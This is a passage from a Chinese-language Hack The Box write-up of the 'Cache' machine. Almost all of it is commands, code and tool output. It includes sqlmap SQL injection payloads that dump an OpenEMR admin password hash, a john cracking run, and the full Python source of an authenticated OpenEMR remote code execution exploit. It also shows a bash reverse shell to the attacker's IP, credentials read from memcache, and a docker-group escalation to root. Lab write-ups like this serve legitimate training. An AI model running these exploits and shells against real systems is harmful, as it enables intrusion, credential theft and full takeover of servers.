| geo_country_reference                 |
| geo_zone_reference                    |
| globals                               |
| gprelations                           |
| history_data                          |
| icd10_dx_order_code                   |
| icd10_gem_dx_10_9                     |
| icd10_gem_dx_9_10                     |
| icd10_gem_pcs_10_9                    |
| icd10_gem_pcs_9_10                    |
| icd10_pcs_order_code                  |
| icd10_reimbr_dx_9_10                  |
| icd10_reimbr_pcs_9_10                 |
| icd9_dx_code                          |
| icd9_dx_long_code                     |
| icd9_sg_code                          |
| icd9_sg_long_code                     |
| immunization_observation              |
| immunizations                         |
| insurance_companies                   |
| insurance_data                        |
| insurance_numbers                     |
| issue_encounter                       |
| issue_types                           |
| lang_constants                        |
| lang_custom                           |
| lang_definitions                      |
| lang_languages                        |
| layout_group_properties               |
| layout_options                        |
| lbf_data                              |
| lbt_data                              |
| list_options                          |
| lists                                 |
| lists_touch                           |
| log_comment_encrypt                   |
| log_validator                         |
| medex_icons                           |
| medex_outgoing                        |
| medex_prefs                           |
| medex_recalls                         |
| misc_address_book                     |
| module_acl_group_settings             |
| module_acl_sections                   |
| module_acl_user_settings              |
| module_configuration                  |
| modules                               |
| modules_hooks_settings                |
| modules_settings                      |
| multiple_db                           |
| notes                                 |
| notification_log                      |
| notification_settings                 |
| onotes                                |
| onsite_documents                      |
| onsite_mail                           |
| onsite_messages                       |
| onsite_online                         |
| onsite_portal_activity                |
| onsite_signatures                     |
| openemr_module_vars                   |
| openemr_modules                       |
| openemr_postcalendar_categories       |
| openemr_postcalendar_events           |
| openemr_postcalendar_limits           |
| openemr_postcalendar_topics           |
| openemr_session_info                  |
| patient_access_offsite                |
| patient_access_onsite                 |
| patient_birthday_alert                |
| patient_data                          |
| patient_portal_menu                   |
| patient_reminders                     |
| patient_tracker                       |
| patient_tracker_element               |
| payment_gateway_details               |
| payments                              |
| pharmacies                            |
| phone_numbers                         |
| pma_bookmark                          |
| pma_column_info                       |
| pma_history                           |
| pma_pdf_pages                         |
| pma_relation                          |
| pma_table_coords                      |
| pma_table_info                        |
| pnotes                                |
| prescriptions                         |
| prices                                |
| procedure_answers                     |
| procedure_order                       |
| procedure_order_code                  |
| procedure_providers                   |
| procedure_questions                   |
| procedure_report                      |
| procedure_result                      |
| procedure_type                        |
| product_registration                  |
| product_warehouse                     |
| registry                              |
| report_itemized                       |
| report_results                        |
| rule_action                           |
| rule_action_item                      |
| rule_filter                           |
| rule_patient_data                     |
| rule_reminder                         |
| rule_target                           |
| sequences                             |
| shared_attributes                     |
| standardized_tables_track             |
| supported_external_dataloads          |
| syndromic_surveillance                |
| template_users                        |
| therapy_groups                        |
| therapy_groups_counselors             |
| therapy_groups_participant_attendance |
| therapy_groups_participants           |
| transactions                          |
| user_settings                         |
| users                                 |
| users_facility                        |
| users_secure                          |
| valueset                              |
| voids                                 |
| x12_partners                          |
+---------------------------------------+

[09:58:45] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/hms.htb'

[*] ending @ 09:58:45 /2020-10-01/

root@JIYE:~/htb/cache#

3.爆users_secure表字段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
root@JIYE:~/htb/cache# sqlmap -r bp -D openemr -T users_secure --columns --batch
        ___
       __H__                                                                                                                                                 
 ___ ___[(]_____ ___ ___  {1.4.9#stable}                                                                                                                     
|_ -| . [(]     | .'| . |                                                                                                                                    
|___|_  [']_|_|_|__,|  _|                                                                                                                                    
      |_|V...       |_|   http://sqlmap.org                                                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:37:10 /2020-10-01/

[10:37:10] [INFO] parsing HTTP request from 'bp'
[10:37:11] [INFO] resuming back-end DBMS 'mysql' 
[10:37:11] [INFO] testing connection to the target URL
[10:37:11] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: eid=(SELECT (CASE WHEN (5601=5601) THEN 1 ELSE (SELECT 8979 UNION SELECT 9885) END))

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: eid=1 AND GTID_SUBSET(CONCAT(0x716b6a6271,(SELECT (ELT(4116=4116,1))),0x7170767071),4116)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: eid=1 AND (SELECT 8798 FROM (SELECT(SLEEP(5)))lAMe)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: eid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a6271,0x4f434469514a6974484d5673426553635173764565766e4448467a77536e44577473487571474973,0x7170767071),NULL-- -
---
[10:37:11] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[10:37:11] [INFO] fetching columns for table 'users_secure' in database 'openemr'
[10:37:12] [INFO] retrieved: 'id','bigint(20)'
[10:37:12] [INFO] retrieved: 'username','varchar(255)'
[10:37:13] [INFO] retrieved: 'password','varchar(255)'
[10:37:13] [INFO] retrieved: 'salt','varchar(255)'
[10:37:14] [INFO] retrieved: 'last_update','timestamp'
[10:37:14] [INFO] retrieved: 'password_history1','varchar(255)'
[10:37:14] [INFO] retrieved: 'salt_history1','varchar(255)'
[10:37:15] [INFO] retrieved: 'password_history2','varchar(255)'
[10:37:15] [INFO] retrieved: 'salt_history2','varchar(255)'
Database: openemr                                                                                                                                           
Table: users_secure
[9 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| id                | bigint(20)   |
| last_update       | timestamp    |
| password          | varchar(255) |
| password_history1 | varchar(255) |
| password_history2 | varchar(255) |
| salt              | varchar(255) |
| salt_history1     | varchar(255) |
| salt_history2     | varchar(255) |
| username          | varchar(255) |
+-------------------+--------------+

[10:37:15] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/hms.htb'

[*] ending @ 10:37:15 /2020-10-01/

4.爆数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
root@JIYE:~/htb/cache# sqlmap -r bp -D openemr -T users_secure -C username,password --dump
        ___
       __H__                                                                                                                                                 
 ___ ___[(]_____ ___ ___  {1.4.9#stable}                                                                                                                     
|_ -| . ["]     | .'| . |                                                                                                                                    
|___|_  ["]_|_|_|__,|  _|                                                                                                                                    
      |_|V...       |_|   http://sqlmap.org                                                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:47:00 /2020-10-01/

[10:47:00] [INFO] parsing HTTP request from 'bp'
[10:47:00] [INFO] resuming back-end DBMS 'mysql' 
[10:47:00] [INFO] testing connection to the target URL
[10:47:01] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: eid=(SELECT (CASE WHEN (5601=5601) THEN 1 ELSE (SELECT 8979 UNION SELECT 9885) END))

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: eid=1 AND GTID_SUBSET(CONCAT(0x716b6a6271,(SELECT (ELT(4116=4116,1))),0x7170767071),4116)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: eid=1 AND (SELECT 8798 FROM (SELECT(SLEEP(5)))lAMe)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: eid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a6271,0x4f434469514a6974484d5673426553635173764565766e4448467a77536e44577473487571474973,0x7170767071),NULL-- -
---
[10:47:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[10:47:01] [INFO] fetching entries of column(s) 'password, username' for table 'users_secure' in database 'openemr'
Database: openemr
Table: users_secure
[1 entry]
+---------------+--------------------------------------------------------------+
| username      | password                                                     |
+---------------+--------------------------------------------------------------+
| openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. |
+---------------+--------------------------------------------------------------+

[10:47:01] [INFO] table 'openemr.users_secure' dumped to CSV file '/root/.local/share/sqlmap/output/hms.htb/dump/openemr/users_secure.csv'
[10:47:01] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/hms.htb'

[*] ending @ 10:47:01 /2020-10-01/

root@JIYE:~/htb/cache#

0x09.破解hash值

破解为xxxxxx

1
2
3
4
5
6
7
8
9
10
11
12
13
root@JIYE:~/htb/cache# cat hash 
$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.
root@JIYE:~/htb/cache# john -w=/usr/share/wordlists/rockyou.txt hash 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx           (?)
1g 0:00:00:00 DONE (2020-10-01 10:58) 5.555g/s 4800p/s 4800c/s 4800C/s tristan..felipe
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@JIYE:~/htb/cache#

0x10.Google搜索exp

OpenEMR < 5.0.1 - (Authenticated) Remote Code Executionexp地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
#!/usr/bin/env python

import argparse
import base64
import requests
import sys

ap = argparse.ArgumentParser(description="OpenEMR RCE")
ap.add_argument("host", help="Path to OpenEMR (Example: http://127.0.0.1/openemr).")
ap.add_argument("-u", "--user", help="Admin username")
ap.add_argument("-p", "--password", help="Admin password")
ap.add_argument("-c", "--cmd", help="Command to run.")
args = ap.parse_args()

ascii = "> .---.  ,---.  ,---.  .-. .-.,---.          ,---.    <\r\n"
ascii+= ">/ .-. ) | .-.\ | .-'  |  \| || .-'  |\    /|| .-.\   <\r\n"
ascii+= ">| | |(_)| |-' )| `-.  |   | || `-.  |(\  / || `-'/   <\r\n"
ascii+= ">| | | | | |--' | .-'  | |\  || .-'  (_)\/  ||   (    <\r\n"
ascii+= ">\ `-' / | |    |  `--.| | |)||  `--.| \  / || |\ \   <\r\n"
ascii+= "> )---'  /(     /( __.'/(  (_)/( __.'| |\/| ||_| \)\  <\r\n"
ascii+= ">(_)    (__)   (__)   (__)   (__)    '-'  '-'    (__) <\r\n"
ascii+= "                                                       \r\n"
ascii+= "   ={>   P R O J E C T    I N S E C U R I T Y   <}=    \r\n"
ascii+= "                                                       \r\n"
ascii+= "         Twitter : >@Insecurity<                       \r\n"
ascii+= "         Site    : >insecurity.sh<                     \r\n"

green = "\033[1;32m"
red = "\033[1;31m"
clear = "\033[0m"

load = "[>$<] ".replace(">", green).replace("<", clear)
err = "[>-<] ".replace(">", red).replace("<", clear)
intro = ascii.replace(">", green).replace("<", clear)

print(intro)

with requests.session() as s:
    login = {"new_login_session_management": "1",
            "authProvider": "Default",
            "authUser": args.user,
            "clearPass": args.password,
            "languageChoice": "1"
            }
    
    print(load + "Authenticating with " + args.user + ":" + args.password)
    r = s.post(args.host + "/interface/main/main_screen.php?auth=login&site=default", data=login)
    if "login_screen.php?error=1&site=" in r.text:
        print(err + "Failed to Login.")
        sys.exit(0)

    # This will rewrite and replace your current GLOBALS, please modify this if you don't want that.
    payload = "form_save=Save&srch_desc=&form_0=main_info.php&form_1=..%2F..%2Finterface"
    payload += "%2Fmain%2Fmessages%2Fmessages.php%3Fform_active%3D1&form_2=1&form_3=tabs_"
    payload += "style_full.css&form_4=style_light.css&form_5=__default__&form_6=__default"
    payload += "__&form_7=1&form_8=0&form_9=175&form_10=OpenEMR&form_12=1&form_13=0&form_"
    payload += "14=0&form_16=1&form_21=1&form_22=1&form_23=1&form_24=1&form_25=http%3A%2F"
    payload += "%2Fopen-emr.org%2F&form_26=&form_27=20&form_28=10&form_30=0&form_31=5&for"
    payload += "m_32=0&form_37=English+%28Standard%29&form_38=1&form_42=1&form_43=1&form_"
    payload += "44=1&form_45=1&form_46=1&form_47=1&form_48=1&form_49=1&form_50=1&form_51="
    payload += "0&form_52=0&form_53=&form_54=2&form_55=.&form_56=%2C&form_57=%24&form_58="
    payload += "0&form_59=3&form_60=6%2C0&form_61=0&form_62=0&form_63=_blank&form_69=1&fo"
    payload += "rm_70=1&form_77=1&form_79=&form_80=&form_81=&form_84=1&form_85=1&form_87="
    payload += "1&form_89=1&form_90=1&form_91=1&form_92=Y1&form_93=1&form_94=2&form_95=0&"
    payload += "form_97=14&form_98=11&form_99=24&form_100=20&form_102=1&form_103=0&form_1"
    payload += "04=0&form_105=ICD10&form_106=1&form_107=1&form_112=3&form_115=1&form_116="
    payload += "&form_119=1.00&form_121=0&form_123=&form_125=30&form_126=&form_127=60&for"
    payload += "m_128=&form_129=90&form_130=&form_131=120&form_132=&form_133=150&form_134"
    payload += "=&form_135=1&form_138=1&form_139=1&form_141=1&form_142=0&form_143=localho"
    payload += "st&form_144=&form_145=&form_146=5984&form_147=&form_150=Patient+ID+card&f"
    payload += "orm_151=Patient+Photograph&form_152=Lab+Report&form_153=Lab+Report&form_1"
    payload += "55=100&form_157=8&form_158=17&form_159=15&form_160=day&form_161=1&form_16"
    payload += "2=2&form_163=1&form_164=10&form_165=10&form_166=15&form_167=20&form_168=1"
    payload += "&form_169=%23FFFFFF&form_170=%23E6E6FF&form_171=%23E6FFE6&form_172=%23FFE"
    payload += "6FF&form_173=1&form_174=0&form_176=1&form_177=1&form_178=1&form_181=1&for"
    payload += "m_182=1&form_183=1&form_184=1&form_185=D0&form_186=D0&form_187=0%3A20&for"
    payload += "m_188=0&form_190=33&form_191=0&form_194=7200&form_198=1&form_199=0&form_2"
    payload += "00=0&form_202=&form_203=&form_204=365&form_205=&form_206=1&form_208=&form"
    payload += "_210=&form_211=&form_212=&form_213=&form_214=&form_215=&form_216=SMTP&for"
    payload += "m_217=localhost&form_218=25&form_219=&form_220=&form_221=&form_222=50&for"
    payload += "m_223=50&form_224=&form_225=&form_226=&form_227=50&form_228=&form_229=&fo"
    payload += "rm_230=&form_231=1&form_232=1&form_233=1&form_234=1&form_235=1&form_236=1"
    payload += "&form_237=1&form_238=1&form_239=Model+Registry&form_240=125789123&form_24"
    payload += "1=1&form_242=1&form_243=1&form_244=&form_245=&form_246=1&form_247=1&form_"
    payload += "248=1&form_249=5&form_250=1&form_252=1&form_253=1&form_254=1&form_255=1&f"
    payload += "orm_256=1&form_257=1&form_258=1&form_262=&form_263=6514&form_264=&form_26"
    payload += "5=&form_267=1&form_268=0&form_269=%2Fusr%2Fbin&form_270=%2Fusr%2Fbin&form"
    payload += "_271=%2Ftmp&form_272=%2Ftmp&form_273=26&form_274=state&form_275=1&form_27"
    payload += "6=26&form_277=country&form_278=lpr+-P+HPLaserjet6P+-o+cpi%3D10+-o+lpi%3D6"
    payload += "+-o+page-left%3D72+-o+page-top%3D72&form_279=&form_280=&form_282=2018-07-"
    payload += "23&form_283=1&form_285=%2Fvar%2Fspool%2Fhylafax&form_286=enscript+-M+Lett"
    payload += "er+-B+-e%5E+--margins%3D36%3A36%3A36%3A36&form_288=%2Fmnt%2Fscan_docs&for"
    payload += "m_290=https%3A%2F%2Fyour_web_site.com%2Fopenemr%2Fportal&form_292=1&form_"
    payload += "296=https%3A%2F%2Fyour_web_site.com%2Fopenemr%2Fpatients&form_297=1&form_"
    payload += "299=&form_300=&form_301=&form_302=https%3A%2F%2Fssh.mydocsportal.com%2Fpr"
    payload += "ovider.php&form_303=https%3A%2F%2Fssh.mydocsportal.com&form_305=https%3A%"
    payload += "2F%2Fyour_cms_site.com%2F&form_306=&form_307=&form_308=0&form_309=https%3"
    payload += "A%2F%2Fhapi.fhir.org%2FbaseDstu3%2F&form_312=https%3A%2F%2Fsecure.newcrop"
    payload += "accounts.com%2FInterfaceV7%2FRxEntry.aspx&form_313=https%3A%2F%2Fsecure.n"
    payload += "ewcropaccounts.com%2Fv7%2FWebServices%2FUpdate1.asmx%3FWSDL%3Bhttps%3A%2F"
    payload += "%2Fsecure.newcropaccounts.com%2Fv7%2FWebServices%2FPatient.asmx%3FWSDL&fo"
    payload += "rm_314=21600&form_315=21600&form_316=&form_317=&form_318=&form_319=1&form"
    payload += "_324=&form_325=0&form_327=137&form_328=7C84773D5063B20BC9E41636A091C6F17E"
    payload += "9C1E34&form_329=C36275&form_330=0&form_332=https%3A%2F%2Fphimail.example."
    payload += "com%3A32541&form_333=&form_334=&form_335=admin&form_336=5&form_339=1&form"
    payload += "_346=LETTER&form_347=30&form_348=30&form_349=72&form_350=30&form_351=P&fo"
    payload += "rm_352=en&form_353=LETTER&form_354=5&form_355=5&form_356=5&form_357=8&for"
    payload += "m_358=D&form_359=1&form_360=9&form_361=1&form_362=104.775&form_363=241.3&"
    payload += "form_364=14&form_365=65&form_366=220"

    p = {}
    for c in payload.replace("&", "\n").splitlines():
        a = c.split("=")
        p.update({a[0]: a[1]})
   
    # Linux only, but can be easily modified for Windows.
    _cmd = "|| echo " + base64.b64encode(args.cmd) + "|base64 -d|bash"
    p.update({"form_284": _cmd})
    
    print(load + "Injecting payload")
    s.post(args.host + "/interface/super/edit_globals.php", data=p)
    sp = s.get(args.host + "/interface/main/daemon_frame.php") # M4tt D4em0n w0z h3r3 ;PpPpp
    if sp.status_code == 200:
        print(load + "Payload executed")

0x11.exploit

1.首先需要安装环境argparse地址

1
2
3
4
5
tar -xzvf argparse-1.4.0.tar.gz
cd argparse-1.4.0
python setup.py install
easy_install argparse
pip install argparse

2.kali监听

1
2
3
root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ..

3.exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@JIYE:~/htb/cache# python2 exp.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.17.216/6666 0>&1'
 .---.  ,---.  ,---.  .-. .-.,---.          ,---.    
/ .-. ) | .-.\ | .-'  |  \| || .-'  |\    /|| .-.\   
| | |(_)| |-' )| `-.  |   | || `-.  |(\  / || `-'/   
| | | | | |--' | .-'  | |\  || .-'  (_)\/  ||   (    
\ `-' / | |    |  `--.| | |)||  `--.| \  / || |\ \   
 )---'  /(     /( __.'/(  (_)/( __.'| |\/| ||_| \)\  
(_)    (__)   (__)   (__)   (__)    '-'  '-'    (__) 
                                                       
   ={   P R O J E C T    I N S E C U R I T Y   }=    
                                                       
         Twitter : @Insecurity                       
         Site    : insecurity.sh                     

[$] Authenticating with openemr_admin:xxxxxx
[$] Injecting payload


4.反弹shell

1
2
3
4
5
6
7
8
9
10
11
root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.10.188] 37914
bash: cannot set terminal process group (1684): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cache:/var/www/hms.htb/public_html/interface/main$ 

www-data@cache:/var/www/hms.htb/public_html/interface/main$ whoami
whoami
www-data
www-data@cache:/var/www/hms.htb/public_html/interface/main$

5.升级shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
www-data@cache:/var/www/hms.htb/public_html/interface/main$ python3 -c "import pty;pty.spawn('/bin/bash')"
<ain$ python3 -c "import pty;pty.spawn('/bin/bash')"        
www-data@cache:/var/www/hms.htb/public_html/interface/main$ 

www-data@cache:/var/www/hms.htb/public_html/interface/main$ ^Z
[1]+  已停止               nc -nvlp 6666
root@JIYE:~# stty raw -echo
root@JIYE:~# nc -nvlp 6666

www-data@cache:/var/www/hms.htb/public_html/interface/main$ 
www-data@cache:/var/www/hms.htb/public_html/interface/main$ 
www-data@cache:/var/www/hms.htb/public_html/interface/main$ whoami
www-data
www-data@cache:/var/www/hms.htb/public_html/interface/main$

6.升级为交互shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
bash: www-data@cache:/var/www/hms.htb/public_html/interface/main$: No such file or directory
<e/main$ [1]+  已停止               nc -nvlp 6666        n$ 
[1]+: command not found
<ic_html/interface/main$ root@JIYE:~# stty raw -echo        
root@JIYE:~#: command not found
<lic_html/interface/main$ root@JIYE:~# nc -nvlp 6666        
root@JIYE:~#: command not found
www-data@cache:/var/www/hms.htb/public_html/interface/main$ 
<cache:/var/www/hms.htb/public_html/interface/main$         
bash: www-data@cache:/var/www/hms.htb/public_html/interface/main$: No such file or directory
<cache:/var/www/hms.htb/public_html/interface/main$         
bash: www-data@cache:/var/www/hms.htb/public_html/interface/main$: No such file or directory
</var/www/hms.htb/public_html/interface/main$ whoami        
bash: www-data@cache:/var/www/hms.htb/public_html/interface/main$: No such file or directory
www-data@cache:/var/www/hms.htb/public_html/interface/main$ www-data
www-data: command not found
<@cache:/var/www/hms.htb/public_html/interface/main$        
bash: www-data@cache:/var/www/hms.htb/public_html/interface/main$: No such file or directory
www-data@cache:/var/www/hms.htb/public_html/interface/main$ 
www-data@cache:/var/www/hms.htb/public_html/interface/main$ 
www-data@cache:/var/www/hms.htb/public_html/interface/main$ 
www-data@cache:/var/www/hms.htb/public_html/interface/main$

7.切换到ash用户得到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
www-data@cache:/home$ cd ash
www-data@cache:/home/ash$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  user.txt
www-data@cache:/home/ash$ cat user.txt 
cat: user.txt: Permission denied
www-data@cache:/home/ash$ su ash
Password: 
ash@cache:~$ whoami
ash
ash@cache:~$ pwd
/home/ash
ash@cache:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  user.txt
ash@cache:~$ cat user.txt 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
ash@cache:~$

0x12.提权

1.查看监听端口

google发现11211端口为memcache服务

1
2
3
4
5
6
7
8
9
ash@cache:/$ ss -lnt
State    Recv-Q    Send-Q        Local Address:Port        Peer Address:Port    
LISTEN   0         80                127.0.0.1:3306             0.0.0.0:*       
LISTEN   0         128               127.0.0.1:11211            0.0.0.0:*       
LISTEN   0         128           127.0.0.53%lo:53               0.0.0.0:*       
LISTEN   0         128                 0.0.0.0:22               0.0.0.0:*       
LISTEN   0         128                       *:80                     *:*       
LISTEN   0         128                    [::]:22                  [::]:*       
ash@cache:/$

2.memcache参考

得到luffy用户与密码0n3_p1ec3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
ash@cache:/$ telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
stats
STAT pid 987
STAT uptime 1807
STAT time 1601548108
STAT version 1.5.6 Ubuntu
STAT libevent 2.1.8-stable
STAT pointer_size 64
STAT rusage_user 0.153965
STAT rusage_system 0.193444
STAT max_connections 1024
STAT curr_connections 1
STAT total_connections 32
STAT rejected_connections 0
STAT connection_structures 2
STAT reserved_fds 20
STAT cmd_get 0
STAT cmd_set 150
STAT cmd_flush 0
STAT cmd_touch 0
STAT get_hits 0
STAT get_misses 0
STAT get_expired 0
STAT get_flushed 0
STAT delete_misses 0
STAT delete_hits 0
STAT incr_misses 0
STAT incr_hits 0
STAT decr_misses 0
STAT decr_hits 0
STAT cas_misses 0
STAT cas_hits 0
STAT cas_badval 0
STAT touch_hits 0
STAT touch_misses 0
STAT auth_cmds 0
STAT auth_errors 0
STAT bytes_read 4597
STAT bytes_written 1200
STAT limit_maxbytes 67108864
STAT accepting_conns 1
STAT listen_disabled_num 0
STAT time_in_listen_disabled_us 0
STAT threads 4
STAT conn_yields 0
STAT hash_power_level 16
STAT hash_bytes 524288
STAT hash_is_expanding 0
STAT slab_reassign_rescues 0
STAT slab_reassign_chunk_rescues 0
STAT slab_reassign_evictions_nomem 0
STAT slab_reassign_inline_reclaim 0
STAT slab_reassign_busy_items 0
STAT slab_reassign_busy_deletes 0
STAT slab_reassign_running 0
STAT slabs_moved 0
STAT lru_crawler_running 0
STAT lru_crawler_starts 2040
STAT lru_maintainer_juggles 3984
STAT malloc_fails 0
STAT log_worker_dropped 0
STAT log_worker_written 0
STAT log_watcher_skipped 0
STAT log_watcher_sent 0
STAT bytes 371
STAT curr_items 5
STAT total_items 150
STAT slab_global_page_pool 0
STAT expired_unfetched 0
STAT evicted_unfetched 0
STAT evicted_active 0
STAT evictions 0
STAT reclaimed 0
STAT crawler_reclaimed 0
STAT crawler_items_checked 28
STAT lrutail_reflocked 0
STAT moves_to_cold 150
STAT moves_to_warm 0
STAT moves_within_lru 0
STAT direct_reclaims 0
STAT lru_bumps_dropped 0
END
get user
VALUE user 0 5
luffy
END
get passwd       
VALUE passwd 0 9
0n3_p1ec3
END


3.luffy登入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
ash@cache:/$ ssh luffy@127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:/qQ34g2zzGVlmbMIKeD7JhlhDf/SPzgYFz000v+3KBI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
luffy@127.0.0.1's password: 
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-109-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Oct  1 10:34:55 UTC 2020

  System load:  0.0               Processes:              181
  Usage of /:   75.0% of 8.06GB   Users logged in:        0
  Memory usage: 12%               IP address for ens160:  10.10.10.188
  Swap usage:   0%                IP address for docker0: 172.17.0.1


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

110 packages can be updated.
0 updates are security updates.


Last login: Wed May  6 08:54:44 2020 from 10.10.14.3
luffy@cache:~$ 
luffy@cache:~$ whoami
luffy
luffy@cache:~$uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
luffy@cache:~$

4.docker提权

可以看到luffy属于docker用户组

docker提权参考

1
2
3
4
5
6
7
8
9
10
11
12
13
luffy@cache:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
# 
# python3 -c "import pty;pty.spawn('/bin/bash')"
root@386a1a19658b:/# 
root@386a1a19658b:/# 
root@386a1a19658b:/# cd
root@386a1a19658b:~# pwd
/root
root@386a1a19658b:~# ls
root.txt
root@386a1a19658b:~# cat root.txt 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
root@386a1a19658b:~#
-------------纸短情长下次再见-------------